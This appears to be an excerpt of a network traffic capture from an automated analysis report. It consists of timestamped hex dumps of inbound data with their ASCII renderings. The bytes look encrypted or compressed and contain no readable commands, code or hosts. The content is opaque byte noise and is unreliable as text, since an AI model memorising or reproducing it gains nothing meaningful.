                                                                                                                                  2022-01-11 22:39:10 UTC4470INData Raw: 12 00 7c 58 c1 59 0f 79 ac 8a 30 a7 0e 76 6a f0 ba c2 37 5c 43 34 c8 ba 9b 47 d5 3d 31 f7 f2 6d 4b 5e 98 f2 3c d2 09 ac 42 35 e0 9c 05 86 58 07 61 48 18 b0 4c d3 ce b7 9b 9f 8e 90 aa 8a 59 4f b4 bf 07 03 b5 30 09 d0 e6 f2 2c 77 b5 a8 14 e0 d9 94 0b 16 0d 02 5c 78 b1 4f 9f e6 6e 28 8b 28 c3 fe d5 3d 7a 04 f6 47 cf 49 7a 29 5d 24 b4 bd 36 95 0a 0b 11 b0 65 40 25 58 c0 43 d8 11 c9 2a 6f a0 f5 08 30 cc b9 83 5a d7 51 b0 32 18 b3 a0 68 4f 53 b4 e2 97 53 3a e6 73 8f 57 c0 57 ce bf e2 22 69 5f 48 f1 73 34 d4 37 cd 20 41 f6 a1 25 42 61 52 4c 34 43 4b a7 5d d1 a1 f2 c8 a9 e7 86 44 e5 56 82 69 96 be 2e da 63 ab e0 af be a6 46 ef f1 ca 20 06 61 d5 12 7b 3a b0 51 c1 cf b5 f5 59 b6 90 bf 98 a9 4b 5d 5d 85 6a c8 1b 04 9c 29 c0 46 5d a4 e8 45 56 01 1d be 8d bc 3e c5 d5
                                                                                                                                  Data Ascii: |XYy0vj7\C4G=1mK^<B5XaHLYO0,w\xOn((=zGIz)]$6e@%XC*o0ZQ2hOSS:sWW"i_Hs47 A%BaRL4CK]DVi.cF a{:QYK]]j)F]EV>
                                                                                                                                  2022-01-11 22:39:10 UTC4486INData Raw: b7 0b b9 1c 1b 0c 9c 80 21 1c 73 44 e4 36 04 f0 68 3a 1a 1d e0 e4 c0 82 9a d2 d6 b7 0a 19 8b 49 8a e1 92 7f da 59 f9 a6 59 33 40 53 48 45 bf de 8c 54 70 69 6d 70 a1 56 f7 44 0a 95 e8 93 ae 4c a3 ef 75 6c 80 da ea a7 23 86 b3 f8 33 1b b8 60 d5 03 a2 00 32 62 0d 5c 27 09 d7 4a a5 e1 6e 24 d7 47 93 88 8f 05 20 96 19 1d 99 8a c3 9e fd 64 4a 41 6a 90 fe 25 db e2 af fb 03 6f b8 25 39 ef ef 57 cf a9 13 c8 66 19 12 95 52 5e 26 40 1b c1 d2 bc 35 77 16 a6 4b c0 8e 14 18 78 e0 2b 69 7f c9 6c ed 2b 51 8d 0e 63 6e 50 0a 15 30 a6 fc 97 a3 d4 b4 5c 1c 3b dd 77 26 4f 72 5d 42 58 33 bf fd c5 2f 17 66 73 cb 97 41 20 68 5e 25 ff 87 4b 51 13 96 03 09 0f 35 e9 3f 6a 20 60 66 c0 9b fa 15 f6 ee 32 d9 46 e7 ee bb 5c 30 50 d2 0d 06 1a 59 9f 6d e7 f8 5e f2 f0 aa d2 79 ff 4f 3b d2
                                                                                                                                  Data Ascii: !sD6h:IYY3@SHETpimpVDLul#3`2b\'Jn$G dJAj%o%9WfR^&@5wKx+il+QcnP0\;w&Or]BX3/fsA h^%KQ5?j `f2F\0PYm^yO;
                                                                                                                                  2022-01-11 22:39:10 UTC4502INData Raw: e2 61 d3 3e 97 30 e9 c9 0a ee 20 6d 49 13 46 67 4c db 22 89 c7 9d c3 51 67 d8 e3 3d fc 18 52 3a e0 44 1f 77 86 47 b2 ca a5 90 db 6a f9 19 08 73 03 fb 43 9e 83 d8 f0 bc 3a 10 e9 b0 4d 96 9d fd a1 0b 51 56 db 3c b0 86 17 74 ed 91 0a ed bd 55 1f 02 8a db e5 c3 79 66 b4 de e3 3f 00 2b 71 1a b6 b8 20 7f 0f 3e b1 b9 a1 f3 cf b5 03 f3 f2 71 32 cd d7 c7 33 74 bf 8b 70 56 28 dc e3 af 5c b9 bb ef c7 fa 42 9f 31 49 19 1a 1f 1a 9c 6d 42 b5 bb b1 57 8a 30 32 fa cb f3 dd 76 38 e4 94 88 21 d2 0e 65 28 32 f5 a2 17 ad 90 78 9b 40 4e ba e9 e8 ff c4 a8 29 64 3b 1e 3c c1 7e 90 bd e9 63 82 25 0b 39 aa b3 1a 4e e0 47 82 a8 a0 f9 06 7e a3 0c 71 d8 8b 60 a7 81 fd 56 4b d5 55 90 f0 98 93 91 4e 25 73 38 6b a4 3a 1a 76 68 72 96 57 78 0d 16 d6 64 d7 0a 97 d3 01 24 3d 7e b1 88 0f 0a
                                                                                                                                  Data Ascii: a>0 mIFgL"Qg=R:DwGjsC:MQV<tUyf?+q >q23tpV(\B1ImBW02v8!e(2x@N)d;<~c%9NG~q`VKUN%s8k:vhrWxd$=~
                                                                                                                                  2022-01-11 22:39:10 UTC4518INData Raw: 63 6e 75 41 1b ce c6 6d 66 2e ae f4 a5 ff 34 ec 35 32 31 57 3b 7f b7 bd 4d 76 b9 e4 ba f7 ab b6 be eb 72 71 94 6f cf c4 b3 9b 80 41 ec df 0f 71 c0 79 2c 0d 80 06 1c cc 1d 32 6c db b7 00 2d f4 f3 19 ce 5b 21 79 5d cd 63 42 06 eb 86 4a 2f 76 31 f0 90 dc 67 6b 99 54 1d c8 7d ca 89 e0 5e 2b 94 0a 74 5d dd 63 6a 24 c4 af 7d 08 42 0d 56 41 72 3b 15 63 70 da 43 b7 50 01 e9 64 73 35 1a 00 cc 88 3e e3 7b b9 2b 25 c8 3b 02 30 76 3f 7b 90 81 9f 0c 8e 0c 79 2e 79 9c 18 d8 c5 e4 41 f8 a3 33 06 82 b6 ac fd 6a 67 eb 4b 6e 41 62 78 38 f0 bd 03 25 55 4b 72 15 d7 28 19 dc 4a eb 03 8a 59 39 34 46 66 eb b0 c7 bb c8 d7 40 30 3b 11 63 23 32 2b 95 b3 e6 d6 be 41 48 5f 38 5d af ba 4d 0e 29 6f 4c ab 66 fd 2b 7c 67 4b 55 5b d1 ed 35 a8 93 e1 a3 4b 59 20 95 1d 0f 0b 27 48 c8 63 ea
                                                                                                                                  Data Ascii: cnuAmf.4521W;MvrqoAqy,2l-[!y]cBJ/v1gkT}^+t]cj$}BVAr;cpCPds5>{+%;0v?{y.yA3jgKnAbx8%UKr(JY94Ff@0;c#2+AH_8]M)oLf+|gKU[5KY 'Hc
                                                                                                                                  2022-01-11 22:39:10 UTC4534INData Raw: 79 4e ef c8 05 f7 34 66 64 9b ac f1 e6 ed 6e 8f 5b bf e6 95 02 c3 16 0a 62 8e 73 6c 66 8f 13 3d 03 04 fb 39 f1 4a d6 0a d1 ae ab d2 7b 5b ca 1b c3 e8 be 9c 26 6d 4e 50 77 e0 96 36 0a b5 c8 65 9f 38 c9 bd f8 37 dd ee b4 3b ba 49 52 d6 35 8b ae 4b dd 5f af cd 23 ed 4c 02 d0 6d 23 04 5a 8e 70 86 0f b3 19 c9 a6 74 bc 2b ae 48 c8 e0 13 26 7a d8 77 81 fd ef a7 c0 a4 0f 55 60 9c c5 a5 7e f0 15 42 20 06 66 35 da a2 ab 85 33 c8 47 a9 a4 4b 81 1a 82 e5 c6 e8 69 b2 e6 7b da 5b d0 97 72 56 f1 a8 6f 84 c1 82 58 9b 56 71 50 83 62 a6 81 1c 6e 98 32 fb d9 b0 75 d3 df 6f 52 be 50 24 7c 92 43 63 6b 63 ce 76 b7 d9 7e 5f 39 a2 28 0b d6 bf b7 64 6a 32 83 82 a5 99 88 96 36 0d 01 2e ee 58 31 4f 98 83 0c 3c 3d 88 31 cc e4 af 57 73 31 91 d9 00 3f 3a 99 50 b5 7b 22 87 dc 1c ff bf
                                                                                                                                  Data Ascii: yN4fdn[bslf=9J{[&mNPw6e87;IR5K_#Lm#Zpt+H&zwU`~B f53GKi{[rVoXVqPbn2uoRP$|Cckcv~_9(dj26.X1O<=1Ws1?:P{"
                                                                                                                                  2022-01-11 22:39:10 UTC4550INData Raw: e2 96 98 dd 6f b0 ea ca 08 63 69 bb 68 92 44 85 4f c5 99 7f 01 1d d8 c3 2b 21 cd 71 d2 dd a2 8d 76 1b 42 79 d2 e1 87 d4 28 90 6e f5 54 41 c6 68 18 44 98 a8 bd fd 75 c1 03 20 41 9c 4d 1d a1 a5 92 d7 b8 5e e1 a3 c6 47 f5 b5 78 bf 4d 6e 8e 35 49 e9 d6 d3 8b 4f d5 e3 fe 52 13 a1 78 72 38 07 50 1a 72 5f a4 9a 5d af 97 5d 31 01 b0 d3 05 e9 85 62 0a 49 ef 68 43 2d 75 bf 73 b3 b6 82 db 60 57 28 26 ce 71 4f 74 09 a6 b7 5d cc 74 fa b1 33 86 2c 32 9e 26 15 48 ae 42 9f 90 16 eb 9b 7b 67 78 5e c2 43 b6 4e a5 2a a5 54 d0 ed 4e 1b fc ff ca 23 86 4b 74 7b d5 38 4a cd 9f 29 57 f3 d0 87 fc ca 8e 60 d1 63 98 42 1a 04 b7 ab d3 38 29 08 c5 ec e2 cd 23 7e f7 cf 57 96 06 0e 8a 24 a6 73 f0 01 fd a5 d4 57 9d d7 b3 50 1b 45 35 5a 9d 04 d7 83 b8 c0 1c 7b 9d 85 9b bb 12 f1 63 a8 ed
                                                                                                                                  Data Ascii: ocihDO+!qvBy(nTAhDu AM^GxMn5IORxr8Pr_]]1bIhC-us`W(&qOt]t3,2&HB{gx^CN*TN#Kt{8J)W`cB8)#~W$sWPE5Z{c
                                                                                                                                  2022-01-11 22:39:10 UTC4566INData Raw: 1e 9e 58 1c 1f e6 0e e6 59 f6 ee 32 ef b7 28 be 7e 67 86 63 8f 55 e6 a2 1b 7e 41 69 1e bf 38 94 85 6a 06 b3 34 4b a4 11 e7 b0 d9 a2 d2 93 a5 6f a0 0e 2a b9 dd b7 a4 61 fe 0f 36 1f 68 34 87 f8 52 bd f1 e2 14 75 43 b3 49 e5 5d 2b ad 07 d7 45 84 2e 31 ba 3a 11 f6 5c 59 49 75 f2 8a 32 b7 3c 8d e0 a4 01 ec 57 8c 08 fe 2f bd 5f 30 08 bc d3 b2 25 81 f0 e1 b7 dc 0f 24 5e ba 0c 7d 1a a6 8a 3d 4e 4e f4 45 49 18 35 81 d0 51 5f b9 db 93 63 93 b5 a6 7e 56 6f 4c d7 af 19 01 b2 d9 b6 f0 37 b3 08 65 48 a1 8e 35 39 56 b7 3d 0b f9 11 5f a1 6f 8b 41 92 7c d2 92 fe a0 12 6d 14 16 72 bb 54 6f c4 da 7b 80 26 8a 13 41 ee fd 9d 64 fc 8a e8 d2 da 7c 2a 0a fe 7e b9 14 34 1f 62 10 ec 22 ca c7 1e b6 2c 54 72 09 ce 3f 7b e5 5f 74 54 dd 1e d3 50 40 9d bf 9f 0f d3 14 8f 6b 40 b8 08 d8
                                                                                                                                  Data Ascii: XY2(~gcU~Ai8j4Ko*a6h4RuCI]+E.1:\YIu2<W/_0%$^}=NNEI5Q_c~VoL7eH59V=_oA|mrTo{&Ad|*~4b",Tr?{_tTP@k@
                                                                                                                                  2022-01-11 22:39:10 UTC4582INData Raw: 0f b4 b1 c2 e8 ba 73 fa 02 01 d9 a5 fa dc a6 d5 df 99 34 15 15 76 d5 b5 7a cd 0c 6e 6f 8d 30 4e 72 fa f7 b5 48 ed 43 60 7b bf 31 ea e9 fc f7 e8 78 0e 7d fb a0 59 99 98 45 2c ef 45 56 cf cb 7b a2 c9 3f 44 71 a5 c0 97 b2 68 4b 0f 3f 29 7b 93 15 f4 da be ee c7 6d 7a de 4f 96 6b 43 c5 0f e0 0f 84 d4 d0 7a 3b 8d ea b9 27 48 ae cb f7 46 ac 0c 0f d6 a2 7a 81 c1 2e 23 5f 0f ea 56 ef bc d4 b8 3e 19 6f 9f 0a 6b 2a 88 a9 87 ae 16 ab eb 44 42 8b 2a f1 17 9e b4 58 ed 16 71 de 94 ee 64 f4 a5 9a 80 ab fe 26 6f 99 7d 41 08 e3 16 c9 e3 46 d2 41 16 a6 cf 39 1a a9 eb 66 19 3f ad 62 30 ce 8c b6 9a 22 86 8f 83 9d 42 3c 9a 8e de bc ed 1f 57 ab af 26 2e 78 0d 7f 5a 69 58 14 d8 1e 82 d2 df 2e f4 16 c8 0a 42 49 19 87 02 6a 3d ee 3e aa ca 02 64 0f ce d4 00 51 33 c1 b0 32 10 27 fa
                                                                                                                                  Data Ascii: s4vzno0NrHC`{1x}YE,EV{?DqhK?){mzOkCz;'HFz.#_V>ok*DB*Xqd&o}AFA9f?b0"B<W&.xZiX.BIj=>dQ32'
                                                                                                                                  2022-01-11 22:39:10 UTC4598INData Raw: 7d a5 bb 63 08 eb ff 3d b9 e5 e9 5f 0b 3a 6b 9c c6 ee a2 e7 a1 96 b1 95 34 84 a5 a2 79 2a 2a 55 12 6c 38 e1 4e 43 2d bc 8a 06 64 70 0a dc ff 7b 53 57 15 0e b4 39 0f 2d b7 ce a1 73 b5 98 4e 48 13 18 df de bb 61 cb e0 5f bf 50 dd 0f 75 80 02 85 b1 ea 4f 12 a0 af b3 d9 34 da b8 ce de bd 6f 17 52 75 6c 9e 18 2a fd a0 7d d8 a8 43 ec fd 2c 1f 84 42 a1 00 55 3b a7 1b 86 52 66 12 b1 72 fb d2 9a d9 be 9f e5 af 53 ba 9a 9a c1 ca 57 71 64 86 2f a1 d6 b7 65 cc 20 ee dd d7 87 1e ab c0 75 ff 58 95 e6 e9 4a 12 c3 de 1c f4 45 42 9d a2 48 44 d2 81 33 18 cf cf 3c 35 3f 83 cc f9 bf 5b 01 ba 43 82 32 64 d5 5c 84 d4 57 4d 31 52 9e 16 34 8f f2 eb f8 d9 8b 77 7e 20 70 6b ec e7 54 b5 c8 6b 02 2a 44 82 e9 e1 fa 87 68 bd 31 1d 03 e8 d8 76 d2 2b 00 1d bc 26 c7 ba 05 68 f5 00 a6 ae
                                                                                                                                  Data Ascii: }c=_:k4y**Ul8NC-dp{SW9-sNHa_PuO4oRul*}C,BU;RfrSWqd/e uXJEBHD3<5?[C2d\WM1R4w~ pkTk*Dh1v+&h
                                                                                                                                  2022-01-11 22:39:10 UTC4614INData Raw: 4a be 05 a4 cf a6 4c 81 de 20 46 3f 18 2a 7b 0b 55 b8 4f 18 c2 ba b8 d0 3d 7b 23 5a 9a d0 ee c8 73 e3 30 69 4b c4 43 5f 75 fd 99 b7 c6 b3 18 02 0f d5 40 84 3e 25 79 5b b2 63 55 ce f3 b7 25 70 d4 99 bb 6c 3b d3 e1 d1 5f b5 61 ea 81 57 cc 43 c8 18 63 df 3e 2e 9f b7 06 02 1f 60 7e ed 9b 87 b9 23 fa 28 5e db ca f6 17 cc 55 ea 20 4e 76 e1 19 76 0c 2b 81 36 e9 3e d8 1e 51 d3 67 96 2b 66 c8 da fa 27 11 38 79 f4 b0 5f 0c 03 74 01 59 be 6a f2 89 ed 9f 02 f9 a7 9b 64 b4 8a 19 85 0c 2f 89 33 25 cb 8c e4 b2 bc 4c 87 6d 4e 7a aa e4 17 fe b3 fb 87 a0 e4 13 ba 0a 4f 93 0c b4 ba 3c fc ef 85 8f fd 57 b8 27 ae ba 14 01 1d 93 ed 3d e0 1c ec 36 4f 86 67 7b 7f f1 99 2a 8a 97 2b f6 83 6d d4 a1 c5 29 e8 eb 4c 73 70 02 d7 01 2e 1e b2 3f c6 25 88 ca 35 db 23 4f f2 e7 59 b4 64 72
                                                                                                                                  Data Ascii: JL F?*{UO={#Zs0iKC_u@>%y[cU%pl;_aWCc>.`~#(^U Nvv+6>Qg+f'8y_tYjd/3%LmNzO<W'=6Og{*+m)Lsp.?%5#OYdr
                                                                                                                                  2022-01-11 22:39:10 UTC4630INData Raw: 32 c1 5d ba 88 1d 1a 38 c3 b9 d4 f1 1b cb 1f 7c 7b e9 43 db 2f b5 f1 56 75 98 16 9f eb 84 30 15 0c 48 81 bc 04 b1 d2 43 07 b9 95 43 19 a7 0c 54 c8 9b 70 fb 79 91 be d0 9b f1 f6 51 0c d2 7d 47 a6 05 8c 24 be 1b a3 54 32 01 d2 b1 87 a1 fb f2 96 33 8a f9 59 46 7e 29 63 8a 1c 47 ad 66 ca 36 38 05 f9 d7 45 94 5e c7 83 41 e9 bc 54 28 ed c1 94 a0 19 f7 24 9d 2b 54 29 2f bb 35 40 c3 5e 84 55 ad f6 df 09 a5 d8 e2 7a 01 ef d3 d8 ca 62 47 01 7c 0a da 3a b5 83 77 df 81 ae e8 f2 28 a9 5a 6e 59 4c 61 6d ba ac 3a 26 1d b2 75 e7 3a cc 84 53 61 3b 72 7e 15 f9 75 fc f9 e5 3f 92 b4 33 ff ba 8e a2 46 97 43 b3 34 ee b5 29 dd c0 0f 24 4c ab 64 e1 c0 8d 1b fe f8 f7 90 e3 2b e3 ea 7e 5e da 73 94 52 6c 63 18 a8 eb 55 c1 c3 99 7e c1 48 68 40 5a 4b 8f 0b 7e 38 f4 dc be b3 84 a4 88
                                                                                                                                  Data Ascii: 2]8|{C/Vu0HCCTpyQ}G$T23YF~)cGf68E^AT($+T)/5@^UzbG|:w(ZnYLam:&u:Sa;r~u?3FC4)$Ld+~^sRlcU~Hh@ZK~8
                                                                                                                                  2022-01-11 22:39:10 UTC4646INData Raw: 15 90 cd ab a8 5e 0f ad 9d 1d ca fe 45 e3 58 a4 a3 ca f9 57 61 e0 ce 85 dd 04 40 df fb fc 9e f0 1e 2b fe 84 e0 10 be 85 4a ec 05 7b 62 7c 2f 3b 09 e5 eb 0c f5 7a 7c 53 09 35 c9 32 9d 7d 0c 28 e5 21 e4 05 87 4b cf 52 d0 28 5d a9 d5 12 a7 d4 04 d7 37 09 b3 6c c9 69 a2 f9 99 66 ef 8f b0 9d 2b a0 f8 05 f9 f7 3a aa fd 33 04 ed 5a 05 ee d2 49 53 bc 13 8a 82 ad 14 e5 e6 e5 c0 1f a1 2d d4 5e 03 f3 c4 9d 6e 46 45 69 aa bf f1 d3 9c ae e6 9a 8c 22 5e ff a2 28 76 82 03 02 4e df fe 43 35 c8 4f 00 11 3c 1b 8b ce b8 97 98 b6 29 8d 87 d1 71 93 39 36 6a 98 64 b1 1a a0 b3 af 8b 76 3d d2 24 37 3b 8d 23 a2 89 d0 5e 72 02 c8 6a d9 6a a8 29 5a 32 71 94 5d e4 81 7f 2b c7 95 f2 4e 69 67 99 dd 4d 46 28 04 8e 39 37 4d 4b 6c fe c0 64 88 e6 3c 0a 66 d9 08 57 d0 72 31 17 8d 33 15 31
                                                                                                                                  Data Ascii: ^EXWa@+J{b|/;z|S52}(!KR(]7lif+:3ZIS-^nFEi"^(vNC5O<)q96jdv=$7;#^rjj)Z2q]+NigMF(97MKld<fWr131
                                                                                                                                  2022-01-11 22:39:10 UTC4662INData Raw: 3a 04 74 ea c5 2b 36 b9 b4 f6 d1 b4 63 82 09 07 7a 44 53 4f fe 3b 3f b3 de 6a 5a 4f e8 df 20 1c 4d e5 2f dd 2b 3d 73 fd fd 8c cf a1 77 5d 4c 69 cd 1b c2 a2 ba 18 1b 66 40 3f f7 11 0e 17 6a d2 44 a7 ff e4 0b b6 62 5b 75 9b d9 b6 34 c4 84 51 a6 62 08 d2 fb 04 7f 32 be 5c 84 39 b0 11 19 e8 d0 cf 04 10 82 db c9 7f eb 6d 7c de 6e 60 29 9b 1e b8 63 58 d2 bd 8e d9 7f da d3 48 c3 bf d2 ab 93 d5 66 b9 f5 5c f4 a9 b1 e9 e2 0b 54 bb 5e 8f 0b 2e 99 0d 96 16 4e f0 74 a8 a9 e0 5f 7d f0 80 16 a9 7b 0e 37 be 6e 99 b4 a6 18 01 cc 35 76 cc 9e c6 e8 38 cd 63 aa 59 ce e8 fd 7e ab 09 91 f0 9b fe cd 13 10 b0 81 8c 55 b7 0e 5d 3e 6b 34 95 81 b5 bb 0b 95 db 8b e1 9d ac 1a 47 ad f3 81 75 09 3f f8 41 2c ad bb 16 1b 8f b1 34 cb ec 15 4a aa ef 55 61 01 59 3c a9 42 b6 0c 02 65 8e 62
                                                                                                                                  Data Ascii: :t+6czDSO;?jZO M/+=sw]Lif@?jDb[u4Qb2\9m|n`)cXHf\T^.Nt_}{7n5v8cY~U]>k4Gu?A,4JUaY<Beb
                                                                                                                                  2022-01-11 22:39:10 UTC4678INData Raw: d3 e9 d1 98 a4 c5 45 a2 6d 60 33 81 34 d3 c5 7c eb 20 af 78 1b 5f d0 d4 12 15 cc 87 a6 cb 6a db e3 02 62 42 93 13 95 7c 6b 56 03 e7 89 5b 98 d9 aa 0e 8e 53 fb ab 6c 15 fe 16 cf 30 86 3b 81 73 96 a6 0a ae 8b 22 8c e9 f4 02 cc 7d a7 01 c3 dc 89 0e 77 44 c6 5f a3 b0 5e 29 73 80 d9 24 d5 2d fa 4e d4 30 dc ce a2 2b 2a ed 4b 61 6c 7f 29 7e 3d 0e 66 2b 20 0e 34 1b fb a1 af 9a d6 60 e8 5d e1 e0 fa 13 43 58 02 c1 11 97 30 a2 2c 63 24 c8 61 9c ea 3b dc e9 a9 34 ea b0 f0 39 a6 f9 22 57 74 7c 62 c5 68 eb 77 cc b7 23 f4 60 a7 c8 65 45 49 3d 6d 5b 90 0b 5b 86 bb e8 fb a1 7a 26 6d fb 2e a5 40 3b fb 8b c9 35 1f 72 5e ae 37 22 ee 1f e9 68 b5 9b d5 97 34 75 f3 e9 34 1a 9e 26 5a 09 36 8e bd b2 ed bc 34 12 f8 8b cd d9 83 f8 f6 45 f7 11 f0 ec 91 8f 91 16 56 49 1a 1c e0 07 1c
                                                                                                                                  Data Ascii: Em`34| x_jbB|kV[Sl0;s"}wD_^)s$-N0+*Kal)~=f+ 4`]CX0,c$a;49"Wt|bhw#`eEI=m[[z&m.@;5r^7"h4u4&Z64EVI
                                                                                                                                  2022-01-11 22:39:10 UTC4694INData Raw: 43 46 d6 53 8c 08 f9 7c 92 49 b3 dd ca fe fb 23 f1 c1 4f 99 f0 67 78 d4 b9 6a 9c 43 26 91 bb 39 ab 25 14 63 83 eb bf 58 39 20 dd 90 e0 eb ff 3d 0f ae 74 b0 65 58 03 7e 94 11 42 51 f5 7c 72 3a 32 9f 4f e3 36 72 a8 1c 61 55 9e 78 fd 4c a8 71 30 19 92 f3 71 c8 50 c6 8f 3d 7c 8c 5a 57 1e 0a f0 87 1d 41 a2 27 d7 f0 59 53 be 5c 9d 75 14 9f 60 b4 10 05 b7 4b 99 d4 cc 7d fa 11 13 8f f8 43 49 82 06 20 2d 62 27 20 89 4c 16 d0 fc 70 1d ad b6 b9 f2 97 56 d2 38 98 9c f6 06 a4 78 3f ca f9 18 63 5f f4 90 fc 94 9d 1f ab ef 5e de 07 72 ff 07 7a 27 df 46 b4 ad 69 19 2c 39 7a 3d af a6 b8 c5 c3 32 7c 2d 9d c4 79 ee c1 4b f0 a1 90 a6 33 3a 83 58 b6 9c 0f e6 8f 05 df a7 4f ac 97 e4 67 cd cd aa 23 2e 60 ae 68 68 f6 76 e7 c0 5c aa 5e f5 0f 04 b6 43 e5 c9 53 bf 04 9d ad 3a 0f 75
                                                                                                                                  Data Ascii: CFS|I#OgxjC&9%cX9 =teX~BQ|r:2O6raUxLq0qP=|ZWA'YS\u`K}CI -b' LpV8x?c_^rz'Fi,9z=2|-yK3:XOg#.`hhv\^CS:u
                                                                                                                                  2022-01-11 22:39:10 UTC4710INData Raw: 0c dd 9c 6f 80 4f f6 b5 e0 50 e5 36 d0 96 25 22 7a 28 5a 45 c5 ae 8e b9 da 74 a4 ce 61 e0 32 ee 07 aa f2 9c 14 f0 b8 cb 4c 23 07 44 8f 60 22 38 33 60 15 aa cc b2 9c 1e 41 e7 31 bc 5c b5 6a 1e 43 15 39 f6 b4 12 36 81 0f 2f 71 22 28 66 b8 8f 4a 7d 91 74 69 3e c2 3c 52 8b c0 bb 9c 6f 3d fe c5 9c c8 b0 eb 98 ff c2 8f f7 ac eb 32 57 cf c1 31 8b cc f8 76 7d 75 f4 28 f1 29 43 26 41 71 9c 95 78 71 20 4a 23 64 ca 1a 3b c4 83 47 95 f5 72 4c 7b 5d 44 99 49 a0 73 99 bd d9 ae f6 2b 38 5f 29 25 68 f6 22 f4 21 55 b6 d9 e0 11 33 69 70 3b 5e 51 c9 2c fe 13 ee 1e 8e df 6e 8b d9 5c bd dd 97 7c 98 e1 06 58 a6 df a3 45 c5 a6 42 c6 6f be d2 c8 b8 5e ca 67 ac 63 eb df b1 aa a1 67 0b 0c ea 3c 66 39 08 4a 88 17 d3 28 28 b5 64 42 84 03 02 36 1f 35 0f 6e 00 41 31 a8 2d 9a 9c 85 61
                                                                                                                                  Data Ascii: oOP6%"z(ZEta2L#D`"83`A1\jC96/q"(fJ}ti><Ro=2W1v}u()C&Aqxq J#d;GrL{]DIs+8_)%h"!U3ip;^Q,n\|XEBo^gcg<f9J((dB65nA1-a
                                                                                                                                  2022-01-11 22:39:10 UTC4726INData Raw: 31 87 13 43 f4 5b eb 46 47 f4 24 14 4d 07 a1 db 00 0f fe 5e 36 3d cf d2 3a 75 5e 87 91 4e e1 1a 71 d0 2f 04 4c 26 f5 aa 96 ba e4 3a d4 71 ca a7 3c d3 b9 bc 28 41 3a 9b 10 49 b5 bc 28 fa 61 ed 0e 3c ba 6b d8 fc 1e e3 2d ad 2e d1 4f 09 d1 84 8a c6 47 ba bd d7 c3 c7 f0 1c b1 7a 8f e4 1d 35 a3 9c 48 55 a3 cf 1b 70 ab 74 25 8d da fd 7d 71 4c eb b3 70 fb 43 ca 77 06 d1 6f 5e 8c 17 b6 10 f4 7c bb a8 0f 88 4c 49 5b c7 24 03 b2 f7 51 86 02 e1 02 3d 46 9c 49 ee 63 ee a9 ed 25 8a cc 0f fd bc 6c 75 12 38 f8 9c 3c 08 51 9a 09 f8 64 26 43 84 45 75 6d 68 f5 6f c1 73 ed f5 ad 5b e9 48 76 7a 19 39 b7 e8 7a 30 fb 49 12 97 6c a6 34 68 88 61 84 ba a9 cd 7b 90 cd 2a 68 b0 db b7 d6 5a c8 50 6d bc 16 03 79 3d a6 cc 55 04 c9 82 b2 08 3f 99 e4 b3 bc 93 71 38 59 bc 0f e3 3d 57 03
                                                                                                                                  Data Ascii: 1C[FG$M^6=:u^Nq/L&:q<(A:I(a<k-.OGz5HUpt%}qLpCwo^|LI[$Q=FIc%lu8<Qd&CEumhos[Hvz9z0Il4ha{*hZPmy=U?q8Y=W
                                                                                                                                  2022-01-11 22:39:10 UTC4742INData Raw: 63 7c 77 d3 91 29 c9 ef 22 6a 84 e3 b1 1e a3 32 38 fb e5 ee ee 18 b3 8d 86 2b 6b f4 e9 1d 24 a2 9c e3 cc 13 6b 23 98 b3 7b f1 91 02 f9 4f 8a 61 0d 68 0e 18 d3 77 84 2f 85 49 f3 96 d9 8c 28 b9 1b 64 49 68 a1 86 c2 9b 8f 0a 82 b5 68 d0 78 6c 96 5c 16 21 65 80 a5 90 ac 07 9d 70 54 ff 45 5b fe f7 35 92 ac 6a 70 70 3e 39 26 4b b8 25 3b 0a fa 4a a2 1d c5 78 a8 d1 1e f1 ca ed 79 b4 06 bc b8 c9 5c 90 8d 27 b7 b7 0b 65 82 60 34 46 f1 49 c1 84 af 74 de c5 8f 46 61 5a f1 b9 23 79 db 8d 86 5a e8 b7 88 1f 34 2f 17 bb 1f 66 5f f7 01 88 68 a2 39 b2 95 b4 59 3f b4 2f 1d 99 61 9b 08 f0 b1 ba 2c c3 61 f1 bc c1 63 f3 6d 1f ec 6f 1d 7e c4 f3 13 66 19 9e a4 1d 99 4c 30 f2 1e 38 15 dc d0 c0 f4 2a bd d9 78 f6 0d 28 44 82 5d 98 d4 11 6f 41 9f a8 1f b8 d5 19 c4 d0 05 d3 08 82 61
                                                                                                                                  Data Ascii: c|w)"j28+k$k#{Oahw/I(dIhhxl\!epTE[5jpp>9&K%;Jxy\'e`4FItFaZ#yZ4/f_h9Y?/a,acmo~fL08*x(D]oAa
                                                                                                                                  2022-01-11 22:39:10 UTC4758INData Raw: 16 f8 5c 4b 3d 41 8e ca 3e b3 8d b6 68 3d ba c1 c2 9d 45 5c 81 13 b5 02 6a 69 fb 11 fd 19 9e 53 ba f1 49 17 ef 81 00 41 6f b9 09 95 6e c0 d7 34 ef c9 f5 80 9f 7a 26 f2 b6 54 75 cb f2 8c 46 6c b2 3d 43 76 71 32 59 19 ec 4e e4 f1 0a 20 95 dc d0 a0 57 78 7c 05 f2 10 9e c3 83 e6 63 b5 35 27 32 5d 40 77 98 fc 72 42 07 07 e4 bd 0a 66 d0 30 53 72 a1 1d c2 50 5d 9b d8 b8 9c 4a 44 5c a6 e0 b0 06 af bd 72 c1 96 3a fd 93 c0 81 2a 99 9e 8d 4f 0c 43 04 8a cf aa fa ca 78 ad 06 63 91 40 4e ee 94 99 e4 71 b8 8d b5 7a d7 f2 36 8f 77 d6 55 a6 12 8a ba 11 25 21 9b 96 b9 6b 65 95 ff b9 ff c3 90 88 07 64 35 08 9c e1 83 a6 9e a4 2e 0d ba f0 d5 fc 16 90 6a 44 d0 a1 83 f8 c6 8f d9 c1 52 6f 21 ac b1 22 2d 65 f8 4e 35 42 96 c8 2a c3 cc 1a 6a b4 82 3f 5a e3 d8 d9 50 03 74 bd 49 ec
                                                                                                                                  Data Ascii: \K=A>h=E\jiSIAon4z&TuFl=Cvq2YN Wx|c5'2]@wrBf0SrP]JD\r:*OCxc@Nqz6wU%!ked5.jDRo!"-eN5B*j?ZPtI
